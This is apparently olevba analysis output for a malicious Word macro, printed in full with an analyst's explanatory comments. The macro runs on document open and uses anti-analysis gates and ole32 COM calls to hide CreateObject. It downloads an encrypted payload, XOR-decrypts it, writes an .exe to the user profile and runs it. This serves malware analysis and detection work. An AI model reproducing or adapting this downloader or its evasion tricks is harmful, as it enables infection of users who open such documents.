- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB-V vbaproject.bin
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: vbaproject.bin
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: vbaproject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Module-level declarations of the macro stored in VBA/ThisDocument. All
' identifiers are randomised; the notes describe only what the declarations show.
'
' 16-byte record (Long + Integer + Integer + 8 bytes), i.e. the layout of a COM
' GUID. It is the type handed to CLSIDFromString / CLSIDFromProgID below.
- Private Type K6nSWfYTCJ
- ETOOEcUg59j As Long
- HhjG8qlzfRpsnobBF As Integer
- MUF5U7fJz As Integer
- G8Q0vHJIdAb91I(7) As Byte
- End Type
' String form of IID_IUnknown, the base COM interface identifier.
- Const VTGFhpz7FtVD As String = "{00000000-0000-0000-C000-000000000046}"
' Result record passed as the last argument of CoCreateInstanceEx: a pointer to
' the requested interface ID, the returned interface, and a status value
' (the shape of the Windows MULTI_QI structure).
- Private Type NdM1mpKmqpF
- HK8KPt1wnHrS As Long
- JITUN As IUnknown
- PqxBjecC7mI As Long
- End Type
' Passed in the server-information position (fourth argument) of
' CoCreateInstanceEx; no field of it is assigned anywhere in this listing.
- Private Type SyROO3UWtSacSa
- XnTmqqh As Long
- Ai9rugFwqT4H43zjH As Long
- NTAGj As String
- H7LBpJk0XA As Long
- End Type
' Direct imports from ole32. HS5RGT77EhJD9 uses them to instantiate COM objects
' from a ProgID, so the words CreateObject / GetObject never occur in the macro
' and a keyword scan reports only the generic "Lib" hit for this capability.
' NOTE(review): pointer parameters are declared As Long in the VBA7 branch too,
' which cannot hold a 64-bit pointer - presumably written for 32-bit Office; confirm.
- #If VBA7 Then
- Private Declare PtrSafe Function CoCreateInstanceEx Lib "ole32" (RDKzbu95tmi As K6nSWfYTCJ, ByVal SfmbYfniannm4s As Long, ByVal XUoz1Syc2RL As Long, PHZ6Q7NJb9 As SyROO3UWtSacSa, ByVal Yo1VAUevWQXQ3Rx9 As Long, XZpi9rugFwq As NdM1mpKmqpF) As Long
- Private Declare PtrSafe Function CLSIDFromProgID Lib "ole32" (ByVal M7FCWQq60fKbE As Long, Rvk1sUXlk As K6nSWfYTCJ) As Long
- Private Declare PtrSafe Function CLSIDFromString Lib "ole32" (ByVal VpGhFxvC As Long, PBiRBJf As K6nSWfYTCJ) As Long
- #Else
- Private Declare Function CLSIDFromString Lib "ole32" (ByVal UyDGN6 As Long, AYHEgLU27r8 As K6nSWfYTCJ) As Long
- Private Declare Function CLSIDFromProgID Lib "ole32" (ByVal Lk0XAUi0 As Long, DbVPe As K6nSWfYTCJ) As Long
- Private Declare Function CoCreateInstanceEx Lib "ole32" (PgGec2k6Kp0s As K6nSWfYTCJ, ByVal KMcNTG5kHdZheA As Long, ByVal WBdlv2f As Long, T8AWG9okSELXY As SyROO3UWtSacSa, ByVal RvgKcDV25jAf As Long, PKf91CWRm As NdM1mpKmqpF) As Long
- #End If
' OH0M is assigned in Document_Open (from DTpA9fMZ2v) and read in Vg0DiIzgDxA,
' where it becomes part of the path of the file that is written.
- Private OH0M As String
' The variables declared below are not referenced anywhere else in this listing;
' they look like padding added by the obfuscator.
- Dim W4epF2liCnvk As String, JImjWUnbapFXE As Integer
- Dim JImjWUnbapFXE1() As Variant, JImjWUnbapFXE2() As Variant, JImjWUnbapFXE3() As Variant, JImjWUnbapFXE4() As Variant, JImjWUnbapFXE5() As Variant, JImjWUnbapFXE6() As Variant, JImjWUnbapFXE7() As Variant, JImjWUnbapFXE8() As Variant, JImjWUnbapFXE9() As Variant, JImjWUnbapFXE10() As Variant
- Dim JImjWUnbapFXE11() As Variant, JImjWUnbapFXE12() As Variant, JImjWUnbapFXE13() As Variant, JImjWUnbapFXE14() As Variant, JImjWUnbapFXE15() As Variant, JImjWUnbapFXE16() As Variant, JImjWUnbapFXE17() As Variant, JImjWUnbapFXE18() As Variant, JImjWUnbapFXE19() As Variant, JImjWUnbapFXE20() As Variant
- Dim JImjWUnbapFXE21() As Variant, JImjWUnbapFXE22() As Variant, JImjWUnbapFXE23() As Variant, JImjWUnbapFXE24() As Variant, JImjWUnbapFXE25() As Variant, JImjWUnbapFXE26() As Variant, JImjWUnbapFXE27() As Variant, JImjWUnbapFXE28() As Variant, JImjWUnbapFXE29() As Variant, JImjWUnbapFXE30() As Variant, JImjWUnbapFXE31() As Variant, JImjWUnbapFXE32() As Variant, JImjWUnbapFXE33() As Variant, JImjWUnbapFXE34() As Variant, JImjWUnbapFXE35() As Variant, JImjWUnbapFXE36() As Variant, JImjWUnbapFXE37() As Variant, JImjWUnbapFXE38() As Variant
' Returns a pseudo-random integer between 99 and 9998 as a String.
' Callers in this listing: Document_Open (stores it in OH0M, later used in a
' file path) and Vg0DiIzgDxA (appends it to the second argument of .Open).
' Lines of the form  Name = n + "m"  assign to undeclared variables that are
' never read; they are filler and do not affect the result.
- Function DTpA9fMZ2v() As String
- OdZH6Tn3dSUI = 12 + "1"
- Dim PJXRSt12hAfr As Long
- EX74nuarzwX0o = 32 + "87"
- AIfaz64P1sE:
- WjwN7I = 39 + "74"
- Randomize
- YvRYF79sj = 37 + "53"
' The bracketed sum folds to 9999, so this is Int(9999 * Rnd): 0..9998.
- PJXRSt12hAfr = Int((2500 + 119 + 2500 - 119 + 2500 + 119 + 2500 - 119 - 1) * Rnd)
- U8vjtAoK3omal = 36 + "56"
' The bracketed sum folds to 99: values below 99 are rejected and redrawn.
- If PJXRSt12hAfr < (25 + 616 + 25 - 616 + 25 + 616 + 25 - 616 - 1) Then GoTo AIfaz64P1sE
- Y4SV1y5K = 84 + "71"
- DTpA9fMZ2v = PJXRSt12hAfr
- GUQhHESPDlfw2Dik = 44 + "92"
- End Function
' Payload stage: request a remote resource, decrypt the response, write it to
' disk and launch it. Reached only from Document_Open when zKK(56) returns True.
' Every string is stored as hex (decoded by YD0sRL05aK) and then decrypted by
' NGh52oil6 with a per-string key, so no URL, path or ProgID appears in clear.
' Values quoted in these notes were worked out by hand from those two routines
' - re-verify with a decoder before relying on them.
' Observable effects for detection: the Office process makes an outbound HTTP
' request, creates a file in the user profile, and starts it as a child process.
' Lines of the form  Name = n + "m"  are filler.
- Sub Vg0DiIzgDxA()
- B0QeiiufSU = 10 + "80"
- Dim QQNuYU2Zlz1U As String, Bhkve9C81y9l As Object, FPODmkbfj9lL As Object
- BMLiyu5c = 9 + "36"
' Destination path = Environ(<name>) & <fixed part> & OH0M & <suffix>.
' The environment-variable name appears to decode to "appdata" and the
' 4-character suffix to ".exe"; OH0M is the random number from DTpA9fMZ2v.
' The fixed middle part is not decoded here.
- QQNuYU2Zlz1U = Environ(NGh52oil6(YD0sRL05aK("F4BBC8D2D8EE14"), "S2TJblsfEeFIG4jw")) & NGh52oil6(YD0sRL05aK("C9CBF3BDC5BB7331553A095530162E"), "MmVtHw8zjF") & OH0M & NGh52oil6(YD0sRL05aK("94DBD7FD"), "Ej8dvvgPAEc")
- Jx9miqJGRIH = 19 + "51"
' COM object created through the ole32 wrapper rather than CreateObject. The
' 17-character ProgID appears to decode to "Microsoft.XMLHTTP", which matches
' the Open / Send / Status / responseBody members used below.
- Set Bhkve9C81y9l = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("84C0F8C71D3C0D374A51182216732C1124"), "JdV6v"))
- UF1foE3p1Ghu = 42 + "9"
' First argument appears to decode to "GET". The second is the encoded request
' target with a fresh random number appended (the decoded target is the
' network indicator for this sample and is not reproduced in these notes).
' Third argument 0 = False; on an XMLHTTP object that requests a synchronous call.
- Bhkve9C81y9l.Open NGh52oil6(YD0sRL05aK("8C89CD"), "HbtYl5IU6f346"), NGh52oil6(YD0sRL05aK("F2CAEFC0A0BE6F7C5D495D7050625A7B74574D4A6A773A31065915241F63"), "RhnjOMFClneOdAeB") & DTpA9fMZ2v, 0
- Qqwa0pezUa = 46 + "77"
- Bhkve9C81y9l.SEnD
' The bracketed sum folds to 200: continue only on that status, otherwise stop
' without writing anything.
- If Bhkve9C81y9l.Status = (50 + 252 + 50 - 252 + 50 + 252 + 50 - 252) Then GoTo Qhyoa
- OQl8VsVOF = 44 + "12"
- Exit Sub
- WcALqwx0acTSQ = 86 + "55"
- Qhyoa:
- XMCvW736Mek5pCa = 49 + "74"
' StrConv(..., 64) is vbUnicode: the response bytes become a string, which
' NGh52oil6 decrypts with a third encoded key before GSfLoW0xSKEex writes it to
' the destination path. The content on the wire is therefore not the file that
' lands on disk, so a network capture alone will not hash-match the dropped file.
- GSfLoW0xSKEex QQNuYU2Zlz1U, NGh52oil6(StrConv(Bhkve9C81y9l.resPONSEBODy, (16 + 160 + 16 - 160 + 16 + 160 + 16 - 160)), NGh52oil6(YD0sRL05aK("A9AFEF998884"), "S3fHEWs27m"))
- FKiWdJ6VvcA2 = 67 + "47"
' Second COM object; the 13-character ProgID appears to decode to
' "WScript.Shell", consistent with the Exec member called on it.
- Set FPODmkbfj9lL = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEE7EEC6E2E4395B1007092534"), "BTHCktKrKff"))
- MAR6Q70cJOeU = 93 + "28"
' Runs the written file; the path is wrapped in double quotes.
- FPODmkbfj9lL.eXeC """" & QQNuYU2Zlz1U & """"
- LHcLiuF = 79 + "67"
- Set Bhkve9C81y9l = Nothing
- End Sub
' String decryption routine: a byte-wise XOR of the input with a 286-entry table
' (partly derived from the key) and with the repeating key itself.
'   GA5N56mzJIETaw - data to decrypt (one character per byte)
'   MJCIRg         - key string
' Returns the decrypted bytes as a string. XOR is performed through
' FCWXoQwGqoI2gsq, so the Xor operator never appears in the source.
' All bracketed sums are constant expressions; their folded values are given in
' the comments. Lines of the form  Name = n + "m"  are filler.
- Function NGh52oil6(ByVal GA5N56mzJIETaw As String, MJCIRg As String) As String
- JRi6mghhJeD = 55 + "92"
' Errors are ignored for the whole routine. With a key shorter than 7 bytes the
' table-seeding loop below indexes before the start of the key array; those
' assignments are skipped rather than raising.
- On Error Resume Next
- QJM2eJP6YM = 74 + "62"
- Dim TtG2N() As Byte, XSKEexRnULKVWy(0 To 285) As Integer, UL3zdJc5GwhYx() As Byte, OLprI, Kj2MuBYW03KPx, HVhU1xMTZP9, IbY9Gm0yb15RKib, Sf1unpciXO As Boolean, I4GS0hdSZfSW0jT As Long
- DdUU = 69 + "32"
' StrConv(..., 128) is vbFromUnicode: string -> byte array (data, then key).
- TtG2N = StrConv(GA5N56mzJIETaw, (32 + 679 + 32 - 679 + 32 + 679 + 32 - 679))
- MscKtjWPOEW = 61 + "58"
- UL3zdJc5GwhYx() = StrConv(MJCIRg, (32 + 907 + 32 - 907 + 32 + 907 + 32 - 907))
- RDoGEkeb = 72 + "23"
' Index of the last key byte.
- Kj2MuBYW03KPx = UBound(UL3zdJc5GwhYx)
- Pd5eabFh = 88 + "81"
' Table entries 0..255 start as the identity mapping.
- For OLprI = 0 To (64 + 700 + 64 - 700 + 64 + 700 + 64 - 700 - 1)
- XSKEexRnULKVWy(OLprI) = OLprI
- Next OLprI
' Entries 256..285 = index XOR 256, i.e. 0..29.
- For OLprI = (64 + 790 + 64 - 790 + 64 + 790 + 64 - 790) To (71.5 + 658 + 71.5 - 658 + 71.5 + 658 + 71.5 - 658 - 1)
- XSKEexRnULKVWy(OLprI) = FCWXoQwGqoI2gsq(OLprI, (64 + 406 + 64 - 406 + 64 + 406 + 64 - 406))
- Next OLprI
' Six iterations mix the key into the table:
'   entries 250..255 <- the key bytes just before the last one, walking backwards
'   entries 0..5     <- key(i-1) XOR (255 - key(last - i))
- For OLprI = 1 To (1.5 + 666 + 1.5 - 666 + 1.5 + 666 + 1.5 - 666)
- XSKEexRnULKVWy(OLprI + (62.5 + 337 + 62.5 - 337 + 62.5 + 337 + 62.5 - 337 - 1)) = UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI)
- XSKEexRnULKVWy(OLprI - 1) = FCWXoQwGqoI2gsq(UL3zdJc5GwhYx(OLprI - 1), (16 + 256 + 16 - 256 + 16 + 256 + 16 - 256 - 1) * (1 + 320 + 1 - 320 + 1 + 320 + 1 - 320) + (1 + 896 + 1 - 896 + 1 + 896 + 1 - 896 - 1) - UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI))
- Next OLprI
- Sf1unpciXO = False
- HVhU1xMTZP9 = 0
- IbY9Gm0yb15RKib = 0
' Main loop: data byte = data byte XOR table(tableIndex) XOR key(keyIndex).
- For OLprI = 0 To UBound(TtG2N)
' Key index wraps to 0 after the last key byte.
- If HVhU1xMTZP9 > Kj2MuBYW03KPx Then HVhU1xMTZP9 = 0
' Table index wraps after 285: to 0 on one pass and to 5 on the next, toggled
' by the Boolean flag.
- If IbY9Gm0yb15RKib > (71.5 + 619 + 71.5 - 619 + 71.5 + 619 + 71.5 - 619 - 1) And Sf1unpciXO = False Then IbY9Gm0yb15RKib = 0: Sf1unpciXO = Not (Sf1unpciXO)
- If IbY9Gm0yb15RKib > (71.5 + 854 + 71.5 - 854 + 71.5 + 854 + 71.5 - 854 - 1) And Sf1unpciXO = True Then IbY9Gm0yb15RKib = (1.5 + 235 + 1.5 - 235 + 1.5 + 235 + 1.5 - 235 - 1): Sf1unpciXO = Not (Sf1unpciXO)
- I4GS0hdSZfSW0jT = FCWXoQwGqoI2gsq(TtG2N(OLprI), XSKEexRnULKVWy(IbY9Gm0yb15RKib))
- TtG2N(OLprI) = FCWXoQwGqoI2gsq(I4GS0hdSZfSW0jT, UL3zdJc5GwhYx(HVhU1xMTZP9))
- HVhU1xMTZP9 = HVhU1xMTZP9 + 1
- IbY9Gm0yb15RKib = IbY9Gm0yb15RKib + 1
- Next OLprI
- EzFqMf2JEX = 24 + "35"
' 32 + 32 = 64 is vbUnicode: byte array -> string for the return value.
- NGh52oil6 = StrConv(TtG2N(), (8 + 630 + 8 - 630 + 8 + 630 + 8 - 630) + (8 + 327 + 8 - 327 + 8 + 327 + 8 - 327))
- V8vVy8c = 44 + "53"
- End Function
' Creates a COM object from a ProgID by calling ole32 directly, standing in for
' CreateObject.
'   YgXIV4mbjX - ProgID string (callers pass a value decrypted at run time)
' Returns the object's IUnknown interface, or Nothing when the ProgID cannot be
' resolved. Because the macro never names CreateObject or a ProgID in clear,
' keyword-based triage sees only the "Lib" declarations; treat ole32 COM imports
' in a document macro as equivalent to CreateObject when reviewing.
' Lines of the form  Name = n + "m"  are filler.
- Function HS5RGT77EhJD9(ByVal YgXIV4mbjX As String) As IUnknown
- VFSW = 29 + "97"
- Dim VY35qfuHGIJnNWf As K6nSWfYTCJ, JrNlWUn8fgH9 As K6nSWfYTCJ, J36506Vmo As Long, Gu6IFZ1v As SyROO3UWtSacSa, G0dqKDSDuamdZ As NdM1mpKmqpF
- Ex9Mufxr = 68 + "34"
' Parse the constant interface-ID string (IID_IUnknown) into a GUID record.
- CLSIDFromString StrPtr(VTGFhpz7FtVD), JrNlWUn8fgH9
- SwP80p = 30 + "75"
' The result record's first field receives the address of that interface ID.
- G0dqKDSDuamdZ.HK8KPt1wnHrS = VarPtr(JrNlWUn8fgH9)
- Xcb = 42 + "47"
' Resolve the ProgID to a class ID; a non-zero return value is a failure.
- J36506Vmo = CLSIDFromProgID(StrPtr(YgXIV4mbjX), VY35qfuHGIJnNWf)
- AmyEXN = 56 + "30"
- If J36506Vmo <> 0 Then Exit Function
- NcwUlf6m = 77 + "70"
' Context value 21 = 1 + 4 + 16 (in-process, local and remote server flags);
' one interface is requested. The return value of the call is not checked.
- CoCreateInstanceEx VY35qfuHGIJnNWf, 0, 21, Gu6IFZ1v, 1, G0dqKDSDuamdZ
- BkzbxnGoPVt16A0cr = 10 + "80"
- Set HS5RGT77EhJD9 = G0dqKDSDuamdZ.JITUN
- Fi2vNcINQoSl8IO = 40 + "16"
- End Function
' Auto-executing entry point: Word runs this when the document is opened and
' macros are enabled. It runs three gates and then calls either the payload
' stage (Vg0DiIzgDxA) or a decoy routine (Mze1TQqABB13R).
' Lines of the form  Name = n + "m"  are filler.
- Sub Document_Open()
- VT8UOUgsRwp = 92 + "14"
' All runtime errors from here on are silently ignored.
- On Error Resume Next
- UxXwF = 73 + "97"
- Dim QrqheSTtixuDC7dV9 As Long, KfEMUDskqqcvM As Long, XS5SDGNPiDrGvSh As Long
- CGo5 = 67 + "95"
- QrqheSTtixuDC7dV9 = 92378621: KfEMUDskqqcvM = 0: XS5SDGNPiDrGvSh = 0
- UbRDiiO1JR = 19 + "16"
' Gate 1: count to 92,378,621 and then require that the counter reached it.
' The loop has no other effect. NOTE(review): this looks like a stall / analysis
' check - an analyser that caps or skips long loops fails the equality test
' and only ever sees the decoy branch; confirm against the tooling in use.
- For KfEMUDskqqcvM = 1 To QrqheSTtixuDC7dV9
- XS5SDGNPiDrGvSh = XS5SDGNPiDrGvSh + 1
- Next KfEMUDskqqcvM
- LWEH6Qx2EwORo9 = 75 + "3"
- If XS5SDGNPiDrGvSh = QrqheSTtixuDC7dV9 Then
- NtHyo8aEUBc = 71 + "93"
' The value built in this loop is never read afterwards.
- Dim L8eK2L608u2Q As Integer, HnbvNeARy As String
- For L8eK2L608u2Q = 6 To 511
- HnbvNeARy = HnbvNeARy + L8eK2L608u2Q
- Next
- AsrO2I7HYgu = 80 + "92"
' Gate 2: both sides fold to 53, so this comparison is always true.
- If (13.5 + 874 + 13.5 - 874 + 13.5 + 874 + 13.5 - 874 - 1) = (13.5 + 135 + 13.5 - 135 + 13.5 + 135 + 13.5 - 135 - 1) Then
- AJcvBp = 4 + "31"
' Random number that Vg0DiIzgDxA later places in the dropped file's path.
- OH0M = DTpA9fMZ2v
- KZ9mSgQ0rgT2Uw = 8 + "52"
' Gate 3: zKK returns True only when its Debug.Assert statement is really
' evaluated; see zKK. Only then does the payload stage run.
- If zKK(56) = True Then
- AdSLYPqnY7dQB = 16 + "29"
- Vg0DiIzgDxA
- ELl1nzDlSZ1y = 79 + "15"
- Else
- GLXGfQ7NxKnYj19U = 39 + "70"
- Mze1TQqABB13R
- XCzEv3EbmKe = 42 + "60"
- End If
- Else
- YlSe09O7zL = 67 + "64"
- Mze1TQqABB13R
- DMAKmdxzzr0 = 10 + "19"
- End If
- Mne6wJBeADKYmM2 = 70 + "37"
- Else
- T0FFypb0vGRCDg = 98 + "10"
- Mze1TQqABB13R
- G3qne510I = 9 + "6"
- End If
- XMW4XDjRhDv = 21 + "22"
- End Sub
' Returns half the byte length of its argument after assigning it to a Byte
' array. Its only caller here, YD0sRL05aK, passes a String; VBA stores two bytes
' per character, so for a String the result is the character count - a Len()
' substitute that avoids naming Len.
' Lines of the form  Name = n + "m"  are filler.
- Function YX0A(ByVal MQtzLoXuOYbLqu As Variant) As Long
- OuFnguCHQCvkiEP = 1 + "39"
- Dim QwpqyS1CCmGIHl() As Byte, TSkgb6tQQP As Long
- QwpqyS1CCmGIHl = MQtzLoXuOYbLqu
- TSkgb6tQQP = UBound(QwpqyS1CCmGIHl)
- OYeqxyYkF0vmrK = 61 + "10"
- YX0A = (TSkgb6tQQP + 1) / 2
- GYQeYWE = 55 + "7"
- End Function
' Bitwise XOR of the two arguments, spelled out as (A And Not B) Or (Not A And B).
' Used by NGh52oil6 for every XOR step, so the Xor operator never appears in the
' source. NOTE(review): presumably done to avoid keyword matches on "Xor"; confirm.
- Private Function FCWXoQwGqoI2gsq(RPDg57P7hlEFgul, ADcW8E85E1Pax)
- FCWXoQwGqoI2gsq = (RPDg57P7hlEFgul And Not ADcW8E85E1Pax) Or (Not RPDg57P7hlEFgul And ADcW8E85E1Pax)
- End Function
' Writes a string to a new file.
'   VvtBc6OjlU - path of the file to create
'   B6V96KLhYx - content to write (Vg0DiIzgDxA passes the decrypted response)
' The helper object is created through HS5RGT77EhJD9 from an encrypted ProgID;
' it is 26 characters long and appears to decode to "Scripting.FileSystemObject"
' (worked out by hand - re-verify), matching the CreateTextFile / Write / Close
' members used. These are the "CreateTextFile" and "Write" hits in the olevba
' summary table. Lines of the form  Name = n + "m"  are filler.
- Sub GSfLoW0xSKEex(VvtBc6OjlU As String, B6V96KLhYx As String)
- Dim GV0xeDx0mp3 As Object
- IJrWlrmJ6zEyhI8rS = 47 + "89"
- Set GV0xeDx0mp3 = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEEEE5AFE7FD3703194F750A120A3E213A27322C1A2F16041354"), "WYBERAXjvh9hrbc"))
- IpK6h9F6mCyBp = 36 + "75"
- With GV0xeDx0mp3.CrEatEtextFILe(VvtBc6OjlU)
- CXAZvr3a3HQHRio = 91 + "90"
- .WrItE (B6V96KLhYx)
- PBuOt0qn2gZW = 42 + "91"
- .Close
- PTUNv57 = 85 + "16"
- End With
- IiJHZnqkHbh = 92 + "76"
- Set GV0xeDx0mp3 = Nothing
- N1Rzcq2EbVxloSUDZ = 28 + "44"
- End Sub
' Decoy branch: Document_Open calls this whenever one of its gates fails.
' It issues unrelated built-in calls with constant arguments and produces
' nothing that the rest of the listing uses. The only CallByName in the listing
' is here, so the "CallByName" row of the olevba summary comes from this decoy
' and not from the download-and-run path in Vg0DiIzgDxA.
- Sub Mze1TQqABB13R()
- XCISdGMlkVj = 87 + "37"
- DoEvents
- ChDir 17
- Weekday 66
- C3T0ybW1xUCCzcT = EOF(17)
- Sin 39
- Rnd
- WvrdmO99Bp36Dt = Day(27)
- App.StartLogging "TiCejbAsO", 62
- AvzmJBeh7hYw = DateValue(56)
- CallByName GfvNc, 1, VbMethod, 42, 89, 74
- EEWiNLRPCNEchhE = 37 + "48"
- End Sub
' Hex decoder: turns a string of hex digit pairs into the characters they encode.
'   V3fzXeOUBPx2S8XV - hex text, two digits per output character
' Chr$(38) & Chr$(72) is "&H", VBA's hex-literal prefix (the "VBA string" row in
' the olevba summary), so each pair is converted with Val("&Hxx") and Chr$.
' YX0A supplies the input length. The output is still encrypted; every caller in
' this listing passes it straight to NGh52oil6, so hex-decoding alone (for
' example olevba --decode) does not reveal the plaintext strings.
' Lines of the form  Name = n + "m"  are filler.
- Function YD0sRL05aK(V3fzXeOUBPx2S8XV As String) As String
- Qe6K16Ywzx = 27 + "58"
- Dim Ps3eMvayS2uM As Integer
- JkCld06th = 16 + "51"
- For Ps3eMvayS2uM = 1 To YX0A(V3fzXeOUBPx2S8XV) Step 2
- YD0sRL05aK = YD0sRL05aK & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(V3fzXeOUBPx2S8XV, Ps3eMvayS2uM, 2)))
- Next
- RmzBqzO5y = 81 + "13"
- End Function
' Environment check built on Debug.Assert. The argument is never used.
' Trace when the Debug.Assert line is evaluated: the outer call sets the static
' counter to 1 and evaluates zKK(93); the nested call raises the counter to 2,
' returns False and resets the counter to 0; the outer call then finds 0 and
' returns True. If the Debug.Assert line is skipped, the counter is still 1 at
' the comparison and the function returns False, which sends Document_Open to
' the decoy routine instead of the payload stage.
' NOTE(review): static emulators or converters that drop Debug statements would
' therefore report only the decoy behaviour; confirm how the analysis tooling
' in use handles Debug.Assert.
' Lines of the form  Name = n + "m"  are filler.
- Function zKK(LUKdO7lrt As Integer) As Boolean
- Oba3cMG = 38 + "16"
- Static KJPXc As Byte
- DyHz6lC = 57 + "65"
- KJPXc = KJPXc + 1
- WUO9NHeGmcc1l7 = 63 + "74"
- If KJPXc = 1 Then Debug.Assert Not zKK(93)
- CkSCXIFqJrIuf = 39 + "7"
' Boolean result of the comparison KJPXc = 0, assigned as the return value.
- zKK = KJPXc = 0
- Iak1tN3MMkVX = 72 + "12"
- KJPXc = 0
- R3eNqpCWdmoXNS = 30 + "40"
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | Document_Open | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | VBA string | &H | Chr$(38) & Chr$(72) |
- +------------+----------------------+-----------------------------------------+